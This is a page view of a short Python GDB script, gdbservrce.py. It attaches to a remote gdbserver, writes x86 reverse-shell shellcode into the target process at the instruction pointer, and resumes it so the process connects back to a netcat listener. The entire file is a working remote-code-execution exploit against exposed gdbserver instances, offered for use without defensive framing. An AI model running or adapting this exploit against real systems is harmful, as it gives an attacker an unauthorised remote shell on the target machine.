/
gdbservrce.py
53 lines (38 loc) · 1.32 KB
/
gdbservrce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import gdb
import socket
import struct
import sys
# host and port of the gdbserver instance
gdbserver = '', 1337
# host and port of the netcat listener
netcat = '', 31338
def progress(fmt, *args):
sys.stdout.write(fmt % args + '\n')
gdb.flush(gdb.STDOUT)
def reverse_shell((ip, port)):
"""Modified x86 reverse shell
http://www.exploit-db.com/exploits/25497/
"""
ip, port = socket.inet_aton(ip), struct.pack('>H', port)
sc = \
'31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268' \
'000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f' \
'cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80'
return sc.decode('hex').replace('\xff'*2, port).replace('\x00'*4, ip)
gdb.execute('set confirm off')
gdb.execute('set verbose off')
progress('[x] Connecting to %s:%d', gdbserver[0], gdbserver[1])
gdb.execute('target extended-remote %s:%d' % gdbserver)
progress('[x] Installing invalid breakpoint')
bp = gdb.Breakpoint('*0', internal=True)
progress('[x] Running..')
try:
gdb.execute('run')
except gdb.error as e:
pass
progress('[x] Deleting invalid breakpoint')
bp.delete()
for idx, ch in enumerate(reverse_shell(netcat)):
gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (idx, ord(ch)))
gdb.execute('continue')
gdb.execute('continue')